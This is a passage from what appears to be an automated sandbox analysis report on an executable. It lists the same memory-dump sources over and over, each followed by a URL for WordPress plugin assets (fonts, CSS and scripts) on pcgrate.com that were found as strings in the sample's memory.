00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, 